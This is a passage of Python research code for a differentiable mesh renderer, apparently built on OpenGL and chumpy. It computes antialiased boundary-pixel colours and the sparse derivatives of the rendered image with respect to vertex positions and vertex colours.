p2 = vertsProjBndSamples.reshape([-1,2,2])[:, 1, :]
p = sampleV.reshape([-1,2])
l = (p2 - p1)
linedist = np.sqrt((np.sum(l ** 2, axis=1)))[:, None]
self.linedist = linedist
lnorm = l / linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:, 0] * lnorm[:, 0] + v1[:, 1] * lnorm[:, 1]
self.d = d
intersectPoint = p1 + d[:, None] * lnorm
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12 ** 2, axis=1)))[:, None]
lnorm12 = l12 / linedist12
d2 = v2[:, 0] * lnorm12[:, 0] + v2[:, 1] * lnorm12[:, 1]
nonIntersect = (d2 < 0) | (d < 0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamples.reshape([-1,2,2])[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n = lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint / dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final / max_nx_ny
d_final = d_final
# invViewMtx = np.linalg.inv(np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])])
# #
# camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
# # invCamMtx = np.r_[np.c_[np.linalg.inv(self.camera.camera_mtx), np.array([0,0,0])], np.array([[0, 0, 0, 1]])]
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# verticesBndSamples = np.concatenate([verticesBndSamples.reshape([-1, 3]), np.ones([verticesBndSamples.size // 3, 1])], axis=1)
# projVerticesBndOutside = (camMtx.dot(view_mtx)).dot(verticesBndSamples.T).T[:, :3].reshape([-1, 2, 3])
# projVerticesBndDir = projVerticesBndOutside[:, 1, :] - projVerticesBndOutside[:, 0, :]
# projVerticesBndDir = projVerticesBndDir / np.sqrt((np.sum(projVerticesBndDir ** 2, 1)))[:, None]
# dproj = (intersectPoint[:, 0] * projVerticesBndOutside[:, 0, 2] - projVerticesBndOutside[:, 0, 0]) / (projVerticesBndDir[:, 0] - projVerticesBndDir[:, 2] * intersectPoint[:, 0])
# # Code to check computation that dproj == dprojy
# # dproj_y = (intersectPoint[:,1]* projVerticesBndOutside[:,0,2] - projVerticesBndOutside[:,0,1]) / (projVerticesBndDir[:,1] - projVerticesBndDir[:,2]*intersectPoint[:,1])
#
# projPoint = projVerticesBndOutside[:, 0, :][:, :] + dproj[:, None] * projVerticesBndDir[:, :]
#
# projPointVec4 = np.concatenate([projPoint, np.ones([projPoint.shape[0], 1])], axis=1)
# viewPointIntersect = (invViewMtx.dot(np.linalg.inv(camMtx)).dot(projPointVec4.T.reshape([4, -1])).reshape([4, -1])).T[:, :3]
#
# barycentricVertsDistIntesect = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :], axis=1)
# barycentricVertsDistIntesect2 = np.linalg.norm(viewPointIntersect - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
# # Code to check barycentricVertsDistIntesect + barycentricVertsDistIntesect2 = barycentricVertsDistEdge
# barycentricVertsDistEdge = np.linalg.norm(
# verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 0, :] - verticesBndSamples[:, 0:3].reshape([-1, 2, 3])[:, 1, :], axis=1)
#
# nonIntersect = np.abs(barycentricVertsDistIntesect + barycentricVertsDistIntesect2 - barycentricVertsDistEdge) > 1e-4
# argminDistNonIntersect = np.argmin(np.c_[barycentricVertsDistIntesect[nonIntersect], barycentricVertsDistIntesect2[nonIntersect]], 1)
#
# self.viewPointIntersect = viewPointIntersect
# self.viewPointIntersect[nonIntersect] = verticesBndSamples.reshape([-1, 2, 4])[nonIntersect, :, 0:3][np.arange(nonIntersect.sum()),
# argminDistNonIntersect, :]
d_finalNP = d_final.copy()
self.d_final = d_finalNP
# self.t_area_bnd = t_area_bnd
# areaWeights = np.zeros([nsamples, nBndFaces])
# areaWeights = t_area_bnd.reshape([nsamples, nBndFaces])
# areaWeightsTotal = areaWeights.sum(0)
## areaWeightsTotal[areaWeightsTotal < 1] = 1
# self.areaWeights = areaWeights
# self.areaWeightsTotal = areaWeightsTotal
finalColorBnd = np.ones([self.nsamples, boundaryFaces.size, 3])
self.d_final_total = d_finalNP.reshape([self.nsamples, -1,1]).sum(0)
# if self.imageGT is not None:
finalColorBnd = sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]))
# finalColorBnd = areaWeights[:,:,None] * sampleColors * d_finalNP.reshape([self.nsamples, -1,1]) / (self.d_final_total.reshape([1, -1,1]) * areaWeightsTotal[None,:,None])
self.finalColorBnd = finalColorBnd
# else:
# finalColorBnd = sampleColors
bndColorsImage = np.zeros_like(self.color_image)
bndColorsImage[(zerosIm * boundaryImage), :] = np.sum(finalColorBnd, axis=0)
finalColorImageBnd = bndColorsImage
if self.imageGT is not None:
bndColorsResiduals = np.zeros_like(self.color_image)
self.sampleResiduals = (sampleColors - self.imageGT.r[(zerosIm * boundaryImage),:][None,:])
self.sampleResidualsWeighted = self.sampleResiduals**2 * d_finalNP.reshape([self.nsamples, -1,1]) / self.d_final_total.reshape([1, -1,1])
bndColorsResiduals[(zerosIm * boundaryImage), :] = np.sum(self.sampleResidualsWeighted,0)
if np.any(boundaryImage):
finalColor = (1 - boundaryImage)[:, :, None] * self.color_image + boundaryImage[:, :, None] * finalColorImageBnd
if self.imageGT is not None:
self.residuals = (self.color_image - self.imageGT.r)
errors = self.residuals**2
finalResidual = (1 - boundaryImage)[:, :, None] * errors + boundaryImage[:, :, None] * bndColorsResiduals
else:
finalColor = self.color_image
if self.imageGT is not None:
finalResidual = (self.color_image - self.imageGT.r)**2
if self.imageGT is None:
finalResidual = None
finalColor[finalColor > 1] = 1
finalColor[finalColor < 0] = 0
return finalColor, finalResidual
def compute_derivatives_verts(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
nVisF = len(visibility.ravel()[visible])
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape(
[nsamples, -1, 2])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
if 4294967295 in sampleFaces:
sampleFaces[sampleFaces==4294967295] = 0 #Not correct but need to check further.
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
n_norm = self.n_norm
dist = self.dist
linedist = self.linedist
d = self.d
v1 = self.v1
lnorm = self.lnorm
d_final = self.d_final
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1, 1, 1])
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
# 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
# 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
# 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
# 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
# Finally, stack data, and IJ of nonbnd with bnd on both dwrt_v and dwrt_vc.
######## 1 derivatives samples outside wrt v 1: (dw * (bar*vc) - dw (bar'*vc') )/ nsamples for face sample
# # #Chumpy autodiff code to check derivatives here:
# chEdgeVerts = ch.Ch(vertsProjBndSamples.reshape([-1,2,2]))
#
# chEdgeVerts1 = chEdgeVerts[:,0,:]
# chEdgeVerts2 = chEdgeVerts[:,1,:]
#
# chSampleVerts = ch.Ch(sampleV.reshape([-1,2]))
# # c1 = (chEdgeVerts1 - chSampleVerts)
# # c2 = (chEdgeVerts2 - chSampleVerts)
# # n = (chEdgeVerts2 - chEdgeVerts1)
#
# #Code to check computation of distance below
# # d2 = ch.abs(c1[:,:,0]*c2[:,:,1] - c1[:,:,1]*c2[:,:,0]) / ch.sqrt((ch.sum(n**2,2)))
# # # np_mat = ch.dot(ch.array([[0,-1],[1,0]]), n)
# # np_mat2 = -ch.concatenate([-n[:,:,1][:,:,None], n[:,:,0][:,:,None]],2)
# # np_vec2 = np_mat2 / ch.sqrt((ch.sum(np_mat2**2,2)))[:,:,None]
# # d2 = d2 / ch.maximum(ch.abs(np_vec2[:,:,0]),ch.abs(np_vec2[:,:,1]))
#
# chl = (chEdgeVerts2 - chEdgeVerts1)
# chlinedist = ch.sqrt((ch.sum(chl**2,axis=1)))[:,None]
# chlnorm = chl/chlinedist
#
# chv1 = chSampleVerts - chEdgeVerts1
#
# chd = chv1[:,0]* chlnorm[:,0] + chv1[:,1]* chlnorm[:,1]
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
# # intersectPointDist1 = intersectPoint - chEdgeVerts1
# # intersectPointDist2 = intersectPoint - chEdgeVerts2
# # Code to check computation of distances below:
# # lengthIntersectToPoint1 = np.linalg.norm(intersectPointDist1.r,axis=1)
# # lengthIntersectToPoint2 = np.linalg.norm(intersectPointDist2.r,axis=1)
#
# chintersectPoint = chEdgeVerts1 + chd[:,None] * chlnorm
#
# chlineToPoint = (chSampleVerts - chintersectPoint)
# chn_norm = chlineToPoint / ch.sqrt((ch.sum(chlineToPoint ** 2, axis=1)))[:, None]
#
# chdist = chlineToPoint[:,0]*chn_norm[:,0] + chlineToPoint[:,1]*chn_norm[:,1]
#
# # d_final_ch = chdist / ch.maximum(ch.abs(chn_norm[:, 0]), ch.abs(chn_norm[:, 1]))
# d_final_ch = chdist
#
# d_final_ch_weights = sampleColors * (d_final_ch.reshape([self.nsamples, -1]) / ch.sum(d_final_ch.reshape([self.nsamples, -1]), 0))[:,:,None]
#
# d_final_outside = d_final_ch.ravel()
# dwdv = d_final_outside.dr_wrt(chEdgeVerts1)
# rows = np.tile(np.arange(d_final_outside.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_outside.shape[0] * 2)
#
# dwdv_r_v1 = np.array(dwdv[rows, cols]).reshape([-1, 2])
#
# dwdv = d_final_outside.dr_wrt(chEdgeVerts2)
# rows = np.tile(np.arange(d_final_ch.shape[0])[None, :], [2, 1]).T.ravel()
# cols = np.arange(d_final_ch.shape[0] * 2)
#
# dwdv_r_v2 = np.array(dwdv[rows, cols]).reshape([-1, 2])
nonIntersect = self.nonIntersect
argminDistNonIntersect = self.argminDistNonIntersect
# max_dx_dy = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
d_final_np = dist
# d_final_np = dist / max_dx_dy
ident = np.identity(2)
ident = np.tile(ident[None, :], [len(d_final_np), 1, 1])
dlnorm = (ident - np.einsum('ij,ik->ijk', lnorm, lnorm)) / linedist[:, None]
dl_normdp1 = np.einsum('ijk,ikl->ijl', dlnorm, -ident)
dl_normdp2 = np.einsum('ijk,ikl->ijl', dlnorm, ident)
dv1dp1 = -ident
dv1dp2 = 0
dddp1 = np.einsum('ijk,ij->ik', dv1dp1, lnorm) + np.einsum('ij,ijl->il', v1, dl_normdp1)
dddp2 = 0 + np.einsum('ij,ijl->il', v1, dl_normdp2)
dipdp1 = ident + (dddp1[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp1
dipdp2 = (dddp2[:, None, :] * lnorm[:, :, None]) + d[:, None, None] * dl_normdp2
#good up to here.
dndp1 = -dipdp1
dndp2 = -dipdp2
dn_norm = (ident - np.einsum('ij,ik->ijk', n_norm, n_norm)) / dist[:, None]
# dn_normdp1 = np.einsum('ijk,ikl->ijl', dn_norm, dndp1)
# dn_normdp2 = np.einsum('ijk,ikl->ijl', dn_norm, dndp2)
ddistdp1 = np.einsum('ij,ijl->il', n_norm, dndp1)
ddistdp2 = np.einsum('ij,ijl->il', n_norm, dndp2)
# argmax_nx_ny = np.argmax(np.abs(n_norm), axis=1)
# dmax_nx_ny_p1 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp1[np.arange(len(dn_normdp1)), argmax_nx_ny]
# dmax_nx_ny_p2 = np.sign(n_norm)[np.arange(len(n_norm)), argmax_nx_ny][:, None] * dn_normdp2[np.arange(len(dn_normdp2)), argmax_nx_ny]
# dd_final_dp1 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p1 * dist + 1. / max_dx_dy[:, None] * ddistdp1
# dd_final_dp2 = -1. / max_dx_dy[:, None] ** 2 * dmax_nx_ny_p2 * dist + 1. / max_dx_dy[:, None] * ddistdp2
dd_final_dp1 = ddistdp1
dd_final_dp2 = ddistdp2
# For those non intersecting points straight to the edge:
v1 = self.v1[nonIntersect][argminDistNonIntersect == 0]
v1_norm = v1 / np.sqrt((np.sum(v1 ** 2, axis=1)))[:, None]
dd_final_dp1_nonintersect = -v1_norm
v2 = self.v2[nonIntersect][argminDistNonIntersect == 1]
v2_norm = v2 / np.sqrt((np.sum(v2 ** 2, axis=1)))[:, None]
dd_final_dp2_nonintersect = -v2_norm
dd_final_dp1[nonIntersect][argminDistNonIntersect == 0] = dd_final_dp1_nonintersect
dd_final_dp1[nonIntersect][argminDistNonIntersect == 1] = 0
dd_final_dp2[nonIntersect][argminDistNonIntersect == 1] = dd_final_dp2_nonintersect
dd_final_dp2[nonIntersect][argminDistNonIntersect == 0] = 0
dd_final_dp1_weighted_part1 = -self.d_final[:,None]* np.tile(dd_final_dp1.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp1_weighted_part2 = dd_final_dp1 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp1_weighted = dd_final_dp1_weighted_part1 + dd_final_dp1_weighted_part2
dd_final_dp2_weighted_part1 = -self.d_final[:,None]*np.tile(dd_final_dp2.reshape([self.nsamples, -1, 2]).sum(0)[None,:,:],[self.nsamples,1,1]).reshape([-1, 2])/(np.tile(self.d_final_total[None,:], [self.nsamples, 1,1]).reshape([-1,1])**2)
dd_final_dp2_weighted_part2 = dd_final_dp2 / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1])
dd_final_dp2_weighted = dd_final_dp2_weighted_part1 + dd_final_dp2_weighted_part2
if self.imageGT is None:
dImage_wrt_outside_v1 = sampleColors.reshape([-1,3,1]) * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = sampleColors.reshape([-1,3,1]) * dd_final_dp2_weighted[:, None, :]
else:
dImage_wrt_outside_v1 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp1_weighted[:, None, :]
dImage_wrt_outside_v2 = self.sampleResiduals.reshape([-1,3,1])**2 * dd_final_dp2_weighted[:, None, :]
# sampleV
# z = dd_final_dp1.reshape([8, -1, 2])
# eq = np.array([np.all(np.sign(z[:, i, :]) == -1) or np.all(np.sign(z[:, i, :]) == 1) for i in range(z.shape[1])])
# dist_ns = dist.reshape([8,-1])
# rightV = sampleV[0, :, 0] > np.max(sampleV[0, :, :], 0)[0] - 1
# dist_ns[0, rightV]
# dImage_wrt_outside_v1.reshape([8, -1, 3, 2])[0, rightV,:]
# d_final_ch_weights
# self.finalColorBnd
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = np.tile(faces.reshape([1, -1, 2]), [self.nsamples, 1, 1]).ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data1 = dImage_wrt_outside_v1.transpose([1, 0, 2])
data2 = dImage_wrt_outside_v2.transpose([1, 0, 2])
data = np.concatenate([data1[:, :, None, :], data2[:, :, None, :]], 2)
data = data.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
######## 2 derivatives samples wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
verticesBnd = self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3])
sampleBarycentricBar = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),
:].reshape([-1, 3, 1])
verts = np.sum(self.v.r[f[sampleFaces.ravel()].ravel()].reshape([-1, 3, 3]) * sampleBarycentricBar, axis=1)
dImage_wrt_bar_v = self.barycentricDerivatives(verticesBnd, f[sampleFaces.ravel()], verts).swapaxes(0, 1)
if self.imageGT is None:
# dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
dImage_wrt_bar_v = dImage_wrt_bar_v * d_final[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# areaTotal = np.tile(self.areaWeightsTotal[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# d_final_total = np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
# dImage_wrt_bar_v = self.areaWeights.reshape([-1,1,1,1]) * dImage_wrt_bar_v * d_final[:, None, None, None] / (areaTotal*d_final_total)
else:
dImage_wrt_bar_v = 2*self.sampleResiduals.reshape([-1,3])[:,:,None,None] * dImage_wrt_bar_v * d_final[:, None, None, None] * self.t_area_bnd[:, None, None, None] / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1, 1, 1, 1])
### Derivatives wrt V: 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
faces = f[sampleFaces].ravel()
JS = col(faces)
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bnd_bar = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd > 1] = 1
bc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :, None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
if self.imageGT is None:
# didp = didp * t_area_nonbnd[None, :, None, None]
didp = didp
else:
didp = 2 * self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None,None] * didp * t_area_nonbnd[None, :, None, None]
n_channels = np.atleast_3d(observed).shape[2]
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 2 * f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS * 2, JS * 2 + 1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS * n_channels + i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width * image_height * n_channels, num_verts * 2))
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd + result_wrt_verts_bnd_bar + result_wrt_verts_nonbnd
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final = self.d_final
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool),
:].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
# Computing gradients:
# A multisampled pixel color is given by: w R + (1-w) R' thus:
# 1 derivatives samples wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
# 2 derivatives samples wrt v bar: (w * (dbar*vc) )/ nsamples for faces sample
# 4 derivatives samples wrt vc : (w * (bar) )/ nsamples for faces sample
# for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
if self.imageGT is None:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
else:
dImage_wrt_bnd_vc = d_final[:, None] * sampleBarycentric.reshape([-1,3]) / np.tile(self.d_final_total[None, :], [self.nsamples, 1, 1]).reshape([-1,1])
dImage_wrt_bnd_vc = 2 * self.sampleResiduals.reshape([-1,3]).T[:,:,None] * dImage_wrt_bnd_vc[None,:]
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])
IS = np.tile(col(pixels), (1, 3)).ravel()
if 4294967295 in sampleFaces:
sampleFaces[sampleFaces==4294967295] = 0 #Not correct but need to check further.
faces = f[sampleFaces].ravel()
JS = col(faces)
data = dImage_wrt_bnd_vc.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd = result
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage) & (visibility != 4294967295)).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
if self.imageGT is None:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
else:
dImage_wrt_nonbnd_vc = barycentric[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3))
dImage_wrt_nonbnd_vc = 2* self.residuals[((~boundaryImage) & (visibility != 4294967295))].reshape((-1, 3)).T[:,:,None] * dImage_wrt_nonbnd_vc[None,:]
data = np.asarray(dImage_wrt_nonbnd_vc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
if self.imageGT is None:
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
if np.any(boundaryImage):
result_wrt_vc = result_wrt_vc_bnd + result_wrt_vc_nonbnd
else:
result_wrt_vc = result_wrt_vc_nonbnd
return result_wrt_vc
def on_changed(self, which):
super().on_changed(which)
if 'v' or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
# gl = self.glf
# texture_data = np.array(self.texture_image*255., dtype='uint8', order='C')
# self.release_textures()
#
# for mesh in range(len(self.f_list)):
# textureIDs = []
# for polygons in range(len(self.f_list[mesh])):
# texture = None
# if self.haveUVs_list[mesh][polygons]:
# texture = GL.GLuint(0)
# GL.glGenTextures( 1, texture )
# GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT,1)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_LINEAR)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR_MIPMAP_LINEAR)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_BASE_LEVEL, 0)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAX_LEVEL, 0)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
# GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# #Send texture.
# #Pol: Check if textures are float or uint from Blender import.
# image = (self.textures_list[mesh][polygons]*255.0).astype(np.uint8)
